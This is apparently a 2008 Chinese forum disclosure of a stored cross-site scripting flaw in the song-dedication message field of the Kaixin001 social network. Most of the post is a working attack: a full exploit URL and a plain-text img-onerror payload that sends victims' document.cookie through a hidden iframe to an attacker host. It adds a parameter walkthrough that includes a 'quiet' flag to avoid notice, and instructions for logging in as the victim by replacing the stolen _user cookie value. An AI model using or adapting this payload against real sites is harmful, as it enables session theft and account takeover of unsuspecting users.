开心网(kaixin001.com) XSS漏洞

2008.9.25，我公布"国内邮箱系统爆发大规模跨站漏洞"后，FireF0X就和我说，什么时候弄个XSS的主题写写，让大家也一起讨论一下。说来惭愧，也一直没写什么东西，这次在"火狐"公布"Kaixin001.comXSS漏洞"，也算是给他有个交代吧。

开心网是一个在线社区，通过它您可以与朋友、同学、同事、家人保持更紧密的联系，及时了解他们的动态；与他们分享你的照片、心情、快乐。


漏洞描述：

开心网(www.kaixin001.com) www.bt285.cn，当你在给好友点歌时，你可以留言，而开心对用户留言的数据没有进行严格过滤，导致攻击者可以提交恶意代码，进行跨站攻击。攻击者利用该漏洞可以盗取开心网用户的cookie，然后利用Cookie欺骗冒充该用户进行账号登录。危害严重。

代码利用：

http://www.kaixin001.com/music/ordermusic.php?verify=××××_1006_××××_1228989163_×××××&musicid=32331139&musichost=×××××&mid=924962&orderuids=×××××&word=%3Cimg+src%3D%22x%22+onerror%3D%22document.write%28%27%3Ciframe+src%3Dhttp%3A%2F%2Fwww.×××××.com%2Fxss%2Fxsscu.asp%3F%27%2Bescape%28document.cookie%29%2B%27+width%3D0++height%3D0++border%3D0%3E%3C%2Fiframe%3E%27%29%22%3E%0D%0A&group=&quiet=1


verify参数作用是验证用户身份
musicid参数是给好友点播歌曲的ID号
musichost是自己的开心网ID
orderuids是好友开心网ID
word是点歌时留言内容
group 用户组
quiet 悄悄地（将不会出现在好友的动态中）
word参数后可以加入精心构造的跨站代码。

盗取Cookie提交代码：

<img src="x" onerror="document.write('<iframesrc=http://www.×××.com/xss/xsscu.asp?'+escape(document.cookie)+' width=0 height=0 border=0></iframe>')">

这段明文盗取COOKIE代码，你要转化为URL编码后再提交。
当点歌成功后，恶意代码将以系统消息的形式，发送给受害者。系统会告诉受害者，你的朋友×××给你点了一首歌。

开心网的COOKIE（其实是Session）格式如下:

SERVERID=_srv102-125_;
_user=3b45065b00978846edecd20e6dae7710_×××××_1226381918;
_email=×××××%40126.com; _invisible=0
。
你只要把_user中的参数替换掉，就可以利用受害者的帐号进行登录了。